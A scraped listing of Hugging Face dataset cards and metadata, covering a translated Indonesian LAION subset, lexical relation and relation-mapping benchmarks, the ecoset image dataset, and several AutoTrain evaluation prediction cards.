--- annotations_creators: - found language_creators: - found language: - id license: - cc-by-sa-4.0 multilinguality: - monolingual size_categories: - 10M<n<100M source_datasets: - original task_categories: - image-to-text task_ids: - image-captioning pretty_name: Laion Indo 70M --- # Dataset Card for Laion Indo 70M ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Dataset Preprocessing](#dataset-preprocessing) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Paper:** [LAION-400M: Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs](https://arxiv.org/abs/2111.02114) ### Dataset Summary Laion Indo is a translated subset of the LAION-400M dataset with 70 million image-text pairs, specifically meant to be used for vision-and-language Indonesian pre-training. The dataset was translated using a custom Marian model. ### Dataset Preprocessing This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. 
To fetch the images, use the following code: ```python from concurrent.futures import ThreadPoolExecutor from functools import partial import io import urllib import PIL.Image from datasets import load_dataset from datasets.utils.file_utils import get_datasets_user_agent USER_AGENT = get_datasets_user_agent() def fetch_single_image(image_url, timeout=None, retries=0): for _ in range(retries + 1): try: request = urllib.request.Request( image_url, data=None, headers={"user-agent": USER_AGENT}, ) with urllib.request.urlopen(request, timeout=timeout) as req: image = PIL.Image.open(io.BytesIO(req.read())) break except Exception: image = None return image def fetch_images(batch, num_threads, timeout=None, retries=0): fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries) with ThreadPoolExecutor(max_workers=num_threads) as executor: batch["image"] = list(executor.map(fetch_single_image_with_args, batch["image_url"])) return batch num_threads = 20 dset = load_dataset("munggok/Laion_Indo") dset = dset.map(fetch_images, batched=True, batch_size=100, fn_kwargs={"num_threads": num_threads}) ``` ### Supported Tasks and Leaderboards - `image-captioning`: This dataset can be used to train a model for the Image Captioning task. ### Languages All captions are translated into Indonesian. ## Dataset Structure ### Data Instances Each instance represents a single image with a caption: ``` { 'image_url': 'image_url', 'caption': 'text here', 'meta' : 'metadata from original laion' } ``` ### Data Fields - `image_url`: Static URL for downloading the image associated with the post. - `caption`: Textual description of the image. 
- `meta` : Containing meta data from laion original dataset (Width,Height,NSFW,Similarity) ### Data Splits There is only training data, with a total of 70662144 rows ## Dataset Creation ### Curation Rationale ### Source Data #### Initial Data Collection and Normalization From the paper: LAION-400M: Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs](https://arxiv.org/abs/2111.02114) #### Who are the source language producers? Not specified. ### Annotations #### Annotation process Annotations are extracted jointly with the images using the automatic pipeline. #### Who are the annotators? Not specified. ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators Soravit Changpinyo, Piyush Sharma, Nan Ding and Radu Soricut. ### Licensing Information CC BY-NC-SA 4.0 ### Citation Information ```bibtex @article{DBLP:journals/corr/abs-2111-02114, author = {Christoph Schuhmann and Richard Vencu and Romain Beaumont and Robert Kaczmarczyk and Clayton Mullis and Aarush Katta and Theo Coombes and Jenia Jitsev and Aran Komatsuzaki}, title = {{LAION-400M:} Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs}, journal = {CoRR}, volume = {abs/2111.02114}, year = {2021}, url = {https://arxiv.org/abs/2111.02114}, eprinttype = {arXiv}, eprint = {2111.02114}, timestamp = {Fri, 05 Nov 2021 15:25:54 +0100}, biburl = {https://dblp.org/rec/journals/corr/abs-2111-02114.bib}, bibsource = {dblp computer science bibliography, https://dblp.org} } ```
adamnik
null
null
null
false
6
false
adamnik/event_detection_dataset
2022-07-20T19:18:18.000Z
null
false
02af6989833382fc594889cc1294954c46a74fe3
[]
[ "license:mit" ]
https://huggingface.co/datasets/adamnik/event_detection_dataset/resolve/main/README.md
--- license: mit ---
fafaf
null
null
null
false
2
false
fafaf/IngrifoDataKerrigan
2022-07-20T20:13:48.000Z
null
false
24061b8d3cc323a202b3551cc5dc17b91d80fa6f
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/fafaf/IngrifoDataKerrigan/resolve/main/README.md
--- license: afl-3.0 ---
relbert
null
@inproceedings{wang-etal-2019-spherere, title = "{S}phere{RE}: Distinguishing Lexical Relations with Hyperspherical Relation Embeddings", author = "Wang, Chengyu and He, Xiaofeng and Zhou, Aoying", booktitle = "Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics", month = jul, year = "2019", address = "Florence, Italy", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/P19-1169", doi = "10.18653/v1/P19-1169", pages = "1727--1737", abstract = "Lexical relations describe how meanings of terms relate to each other. Typical examples include hypernymy, synonymy, meronymy, etc. Automatic distinction of lexical relations is vital for NLP applications, and also challenging due to the lack of contextual signals to discriminate between such relations. In this work, we present a neural representation learning model to distinguish lexical relations among term pairs based on Hyperspherical Relation Embeddings (SphereRE). Rather than learning embeddings for individual terms, the model learns representations of relation triples by mapping them to the hyperspherical embedding space, where relation triples of different lexical relations are well separated. Experiments over several benchmarks confirm SphereRE outperforms state-of-the-arts.", }
[Lexical Relation Classification](https://aclanthology.org/P19-1169/)
false
2,253
false
relbert/lexical_relation_classification
2022-07-20T23:24:17.000Z
null
false
9862d1e870fe6dba4922d3d326c9c8b90a2ecad5
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:n<1K" ]
https://huggingface.co/datasets/relbert/lexical_relation_classification/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - n<1K pretty_name: Lexical Relation Classification --- # Dataset Card for "relbert/lexical_relation_classification" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://aclanthology.org/P19-1169/](https://aclanthology.org/P19-1169/) - **Dataset:** Lexical Relation Classification ### Dataset Summary Five different datasets (`BLESS`, `CogALexV`, `EVALution`, `K&H+N`, `ROOT09`) for lexical relation classification used in [SphereRE](https://www.aclweb.org/anthology/P19-1169/). ### Dataset Summary This dataset contains 5 different word analogy questions used in [Analogy Language Model](https://aclanthology.org/2021.acl-long.280/). | name | train | validation | test | |---------------|------:|-------:|-----:| | `BLESS` | 18582 | 1327 | 6637 | | `CogALexV` | 3054 | - | 4260 | | `EVALution` | 5160 | 372 | 1846 | | `K&H+N` | 40256 | 2876 | 14377 | | `ROOT09` | 8933 | 638 | 3191 | ## Dataset Structure ### Data Instances An example looks as follows. ``` {"head": "turtle", "tail": "live", "relation": "event"} ``` The `stem` and `tail` are the word pair and `relation` is the corresponding relation label. ### Citation Information ``` @inproceedings{wang-etal-2019-spherere, title = "{S}phere{RE}: Distinguishing Lexical Relations with Hyperspherical Relation Embeddings", author = "Wang, Chengyu and He, Xiaofeng and Zhou, Aoying", booktitle = "Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics", month = jul, year = "2019", address = "Florence, Italy", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/P19-1169", doi = "10.18653/v1/P19-1169", pages = "1727--1737", abstract = "Lexical relations describe how meanings of terms relate to each other. Typical examples include hypernymy, synonymy, meronymy, etc. 
Automatic distinction of lexical relations is vital for NLP applications, and also challenging due to the lack of contextual signals to discriminate between such relations. In this work, we present a neural representation learning model to distinguish lexical relations among term pairs based on Hyperspherical Relation Embeddings (SphereRE). Rather than learning embeddings for individual terms, the model learns representations of relation triples by mapping them to the hyperspherical embedding space, where relation triples of different lexical relations are well separated. Experiments over several benchmarks confirm SphereRE outperforms state-of-the-arts.", } ``` ### LICENSE The LICENSE of all the resources are under [CC-BY-NC-4.0](./LICENSE). Thus, they are freely available for academic purpose or individual research, but restricted for commercial use.
relbert
null
@article{turney2008latent, title={The latent relation mapping engine: Algorithm and experiments}, author={Turney, Peter D}, journal={Journal of Artificial Intelligence Research}, volume={33}, pages={615--655}, year={2008} }
[Relation Mapping](https://www.jair.org/index.php/jair/article/view/10583)
false
498
false
relbert/relation_mapping
2022-08-11T10:51:58.000Z
null
false
517e8e60404a2e2961bf28e0fd3631cd8424e81d
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1<n<1K" ]
https://huggingface.co/datasets/relbert/relation_mapping/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1<n<1K pretty_name: Relation Mapping --- # Dataset Card for "relbert/relation_mapping" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://www.jair.org/index.php/jair/article/view/10583](https://www.jair.org/index.php/jair/article/view/10583) - **Dataset:** Relation Mapping ### Dataset Summary Relation Mapping is a task to choose optimal combination of word pairs (see more detail in the [paper](https://www.jair.org/index.php/jair/article/view/10583)). Relation mapping `M` is the set of bijective map in between two sets of terms (`A` and `B`): ``` [set `A`]: ("solar system", "sun", "planet", "mass", "attracts", "revolves", "gravity") [set `B`]: ("atom", "nucleus", "electron", "charge", "attracts", "revolves", "electromagnetism") [Relation Mapping `M`] * "solar system" -> "atom" * "sun" -> "nucleus" * "planet" -> "electron" * "mass" -> "charge" * "attracts" -> "attracts" * "revolves" -> "revolves" * "gravity" -> "electromagnetism" ``` ***[Relation Mapping Problem](https://www.jair.org/index.php/jair/article/view/10583)*** is the task to identify the mapping `M` given the sets of terms `A` and `B`. ## Dataset Structure ### Data Instances An example looks as follows. ``` { "id": "m10", "reference": ["seeing", "understanding"], "source": ["seeing", "light", "illuminating", "darkness", "view", "hidden"], "target": ["understanding", "knowledge", "explaining", "confusion", "interpretation", "secret"], "agreement": [68.2, 77.3, 86.4, 86.4, 68.2, 86.4], "pos": ["vbg", "nn", "vbg", "nn", "nn", "jj"], "target_random": ["knowledge", "interpretation", "explaining", "confusion", "understanding", "secret"] } ``` - `source`: A list of terms, which is the source of the relation mapping from. - `target_random`: A list of terms, where we want to find a mapping from `source` to. 
- `target`: A correctly ordered `target_random` that aligns with the `source`. Given `source` and `target_random`, the task is to predict the correct order of `target_random` so that it matches `target`. On average, 7 terms are in the set, so the total number of possible orders is 5040. ### Data Splits | name |test| |---------|----:| |relation_mapping| 20 | ### Citation Information ``` @article{turney2008latent, title={The latent relation mapping engine: Algorithm and experiments}, author={Turney, Peter D}, journal={Journal of Artificial Intelligence Research}, volume={33}, pages={615--655}, year={2008} } ```
conceptofmind
null
null
null
false
1
false
conceptofmind/test
2022-07-21T02:23:45.000Z
null
false
272eb4dff01e254d0a962aee8dfbd729710574d8
[]
[]
https://huggingface.co/datasets/conceptofmind/test/resolve/main/README.md
test
richartruddie
null
null
null
false
1
false
richartruddie/richartruddie
2022-07-21T05:42:42.000Z
null
false
06cdd71aa5f3779efac159b56d9be175b6719a52
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/richartruddie/richartruddie/resolve/main/README.md
--- license: apache-2.0 ---
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-xsum-8bc70ef8-11355511
2022-07-22T06:44:01.000Z
null
false
10c6f27014e29ecee20aaa336dc25412c0fedf81
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-8bc70ef8-11355511/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: [] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
kietzmannlab
null
@article{mehrer2021ecologically, title={An ecologically motivated image dataset for deep learning yields better models of human vision}, author={Mehrer, Johannes and Spoerer, Courtney J and Jones, Emer C and Kriegeskorte, Nikolaus and Kietzmann, Tim C}, journal={Proceedings of the National Academy of Sciences}, volume={118}, number={8}, year={2021}, publisher={National Acad Sciences} }
Tired of all the dogs in ImageNet (ILSVRC)? Then ecoset is here for you. 1.5m images from 565 basic level categories, chosen to be both (i) frequent in linguistic usage, and (ii) rated by human observers as concrete (e.g. ‘table’ is concrete, ‘romance’ is not). Here we collect resources associated with ecoset. This includes the dataset, trained deep neural network models, code to interact with them, and published papers using it.
false
5
false
kietzmannlab/ecoset
2022-10-21T15:11:44.000Z
ecoset
false
8ef1b28a538b6c259b5e1ad6098b03a8c6f09336
[]
[ "license:cc", "source_datasets:original", "task_categories:image-classification", "task_ids:multi-class-classification", "task_ids:multi-class-image-classification", "tags:other-image-classification", "tags:image-classification" ]
https://huggingface.co/datasets/kietzmannlab/ecoset/resolve/main/README.md
--- license: cc source_datasets: - original task_categories: - image-classification task_ids: - multi-class-classification - multi-class-image-classification paperswithcode_id: ecoset pretty_name: Ecoset tags: - other-image-classification - image-classification --- ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Installation](#installation) - [Install requirements](#install-requirements) - [Download settings](#download-settings) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** [https://www.kietzmannlab.org/ecoset](https://www.kietzmannlab.org/ecoset/) - **Repository:** [https://codeocean.com/capsule/9570390/tree/v1](https://codeocean.com/capsule/9570390/tree/v1) - **Paper:** [https://www.pnas.org/doi/full/10.1073/pnas.2011417118](https://doi.org/10.1073/pnas.2011417118) - **Point of Contact:** [tim.kietzmann@uni-osnabrueck.de](tim.kietzmann@uni-osnabrueck.de) ### Dataset Summary Tired of all the dogs in ImageNet (ILSVRC)? Then ecoset is here for you. 1.5m images from 565 basic level categories, chosen to be both (i) frequent in linguistic usage, and (ii) rated by human observers as concrete (e.g. ‘table’ is concrete, ‘romance’ is not). 
Ecoset is a typical image recognition dataset, combining images of objects with appropriate labels (one label per image). Importantly, ecoset is intended to provide higher ecological validity than its counterparts, with a mislabelling error rate < 5% and filtered for NSFW content. For more information on the dataset, consider reading the [original publication](https://doi.org/10.1073/pnas.2011417118). Ecoset consists of a train, test, and validation subset which all are openly available to the user. ### Supported Tasks and Leaderboards Ecoset is a large multi-class single-label object recognition image dataset (similar to ImageNet). ## Installation ### Install Requirements In order to work with ecoset, please make sure to install the s3 compatible version of huggingface datasets, which should include the `s3fs`, `botocore` and `boto3` modules: ```bash pip install datasets[s3] ``` If you want to work with the dataset in `Huggingface.datasets`, you might also want to make sure to install PIL (`pip install Pillow`) in order to work with image input. However, downloading the dataset will work despite not having installed PIL. ### Download Settings Please set `ignore_verifications=True` when downloading this dataset, else the download will result in an error: ```python from datasets import load_dataset dataset = load_dataset("kietzmannlab/ecoset", ignore_verifications=True) ``` | NOTE: If you get errors like: `FileNotFoundError: [Errno 2] No such file or directory:'<DATASET_PATH>'` this is likely due to having previously downloaded the dataset and then cancelling the download. If this is the case for you, you can fix this error by manually removing the dataset path and reinstalling the dataset. | | --- | ## Dataset Structure We show detailed information for all the configurations of the dataset. Currently, there is only one setting (`Full`) available, containing all data. 
### Data Instances #### Full - **Size of downloaded dataset files:** 155 GB - **Total amount of disk used:** 311 GB ## Dataset Creation A total of 565 categories were selected based on the following: 1) their word frequency in American television and film subtitles (SUBTLEX_US), 2) the perceived concreteness by human observers, and 3) the availability of a minimum of 700 images. Images were sourced via the overall ImageNet database (the same resource used for ILSVRC 2012) or obtained under CC BY-NC-SA 2.0 license from Bing image search and Flickr. Thorough data cleaning procedures were put in place to remove duplicates and to assure an expected misclassification rate per category of <4%. ### Curation Rationale More information on the curation of the dataset can be found in the [original publication](https://doi.org/10.1073/pnas.2011417118). ### Source Data The source data is available under: [https://codeocean.com/capsule/9570390/tree/v1](https://codeocean.com/capsule/9570390/tree/v1) ### Annotations Each ecoset image folder is annotated with class labels according to the main object depicted in a class of images. No further annotations are added to the dataset. ### Personal and Sensitive Information The dataset was tested to exclude sensitive images using Yahoo's Open NSFW detection model, removing all image with an NSFW score above 0.8. For this dataset, only images with secured license information was used, which should prevent the inclusion of images without consent of the image's authors and subjects. Despite these measures, it is possible that the images in the dataset contain personal and sensitive information. ## Considerations for Using the Data ### Social Impact of Dataset Large-scale image-label datasets such as ImageNet are the backbone of modern Computer Vision. However, such large datasets often suffer from problems like mislabeling, category biases, misrepresentations, and unsafe content. 
Ecoset was created with the aim to reduce these biases and consequently improve the social impact of Computer Vision techniques trained on the dataset. More information on the social impact of the dataset can be found in the [original publication](https://doi.org/10.1073/pnas.2011417118). ### Discussion of Biases Despite best efforts to provide an ecologically valid and overall less biased dataset, ecoset is still likely to contain biased data. The category selection of ecoset was based on human concreteness ratings and word frequencies in a corpus consisting of American television and film subtitles. This undoubtedly biases the category selection toward Western cultures. Image inclusion was based on the availability via Bing/Flickr search results as well as the existence of relevant ImageNet categories. Images depicting people, specifically the categories “man,” “woman,” and “child,” were not sampled according to census distributions (age, ethnicity, gender, etc.). ### Other Known Limitations In addition to points mentioned in [Discussion of Biases](#discussion-of-biases), ecoset image and category distributions do not reflect the naturalistic, egocentric visual input typically encountered in the everyday life of infant and adults. ## Additional Information ### Dataset Curators The corpus was put together by Johannes Mehrer, Courtney J. Spoerer, Emer C. Jones, Nikolaus Kriegeskorte, and Tim C. Kietzmann. ### Licensing Information Ecoset is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 2.0 license (cc-by-nc-sa-2.0). 
### Citation Information ``` @article{mehrer2021ecologically, title={An ecologically motivated image dataset for deep learning yields better models of human vision}, author={Mehrer, Johannes and Spoerer, Courtney J and Jones, Emer C and Kriegeskorte, Nikolaus and Kietzmann, Tim C}, journal={Proceedings of the National Academy of Sciences}, volume={118}, number={8}, pages={e2011417118}, year={2021}, publisher={National Acad Sciences} } ``` ### Contributions The ecoset dataloader and dataset card was created by [@DiGyt](https://github.com/DiGyt) on behalf of [@kietzmannlab](https://huggingface.co/kietzmannlab). For questions and suggestions feel free to reach out.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395515
2022-07-21T09:57:46.000Z
null
false
9d7c3583cb446ef2e26c6fca24324e7dd295e238
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cestwc/cnn_dailymail-test50" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395515/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cestwc/cnn_dailymail-test50 eval_info: task: summarization model: facebook/bart-large-cnn metrics: [] dataset_name: cestwc/cnn_dailymail-test50 dataset_config: cestwc--cnn_dailymail-test50 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: facebook/bart-large-cnn * Dataset: cestwc/cnn_dailymail-test50 * Config: cestwc--cnn_dailymail-test50 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Buckeyes2019](https://huggingface.co/Buckeyes2019) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395514
2022-07-21T09:58:16.000Z
null
false
035943f67ab75602dc39ab84e279f27f10e80e1e
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cestwc/cnn_dailymail-test50" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cestwc__cnn_dailymail-test50-b9fb5faf-11395514/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cestwc/cnn_dailymail-test50 eval_info: task: summarization model: google/pegasus-cnn_dailymail metrics: [] dataset_name: cestwc/cnn_dailymail-test50 dataset_config: cestwc--cnn_dailymail-test50 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: google/pegasus-cnn_dailymail * Dataset: cestwc/cnn_dailymail-test50 * Config: cestwc--cnn_dailymail-test50 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Buckeyes2019](https://huggingface.co/Buckeyes2019) for evaluating this model.
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-banking77-10fe815c-11415521
2022-07-21T12:41:56.000Z
null
false
0f685a035621e4a9c17aa71437e1d6325144d5d4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-10fe815c-11415521/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-banking77-34727576-11425522
2022-07-21T12:41:53.000Z
null
false
e83125a08d57be6c9e0aa40ad7f06ecb1d77adc5
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-34727576-11425522/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-banking77-9cb960fa-11435523
2022-07-21T12:41:59.000Z
null
false
1f3971387a63eab5ed76d795c501249904f2161b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:banking77" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-banking77-9cb960fa-11435523/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - banking77 eval_info: task: multi_class_classification model: nickprock/distilbert-base-uncased-banking77-classification metrics: [] dataset_name: banking77 dataset_config: default dataset_split: test col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: nickprock/distilbert-base-uncased-banking77-classification * Dataset: banking77 * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-82ea4996-11445524
2022-07-22T14:59:19.000Z
null
false
2ba19f47e9b5a645c1c2e9232c8abd69f91ec8df
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-82ea4996-11445524/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: facebook/bart-large-cnn metrics: [] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: train col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: facebook/bart-large-cnn * Dataset: cnn_dailymail * Config: 3.0.0 * Split: train To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@jmsteen](https://huggingface.co/jmsteen) for evaluating this model.
munggok
null
null
null
false
1
false
munggok/pmd_indonesia
2022-07-21T16:37:36.000Z
null
false
85a3e098ce748e1590a85b370b61a62e898d0bf5
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/munggok/pmd_indonesia/resolve/main/README.md
--- license: cc-by-4.0 ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-976d13e6-0b05-475e-9b4e-e8fbc174cfae-346
2022-07-21T15:37:45.000Z
null
false
f39a0f32e1e09f34099c4b0ed22b35935e537cbc
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-976d13e6-0b05-475e-9b4e-e8fbc174cfae-346/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-d3ec9b9a-b64a-40a0-baff-3af478f604df-367
2022-07-21T15:50:03.000Z
null
false
e66c0d2ce2bde245f0a64d8eea309b2f27e26c80
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-d3ec9b9a-b64a-40a0-baff-3af478f604df-367/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/extractive-question-answering metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/extractive-question-answering * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-f2158b57-4f5f-457d-9656-edbe0fb0d311-398
2022-07-21T16:01:11.000Z
null
false
0a02e8200fb7a51296112bade2ab912df6f09361
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-f2158b57-4f5f-457d-9656-edbe0fb0d311-398/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
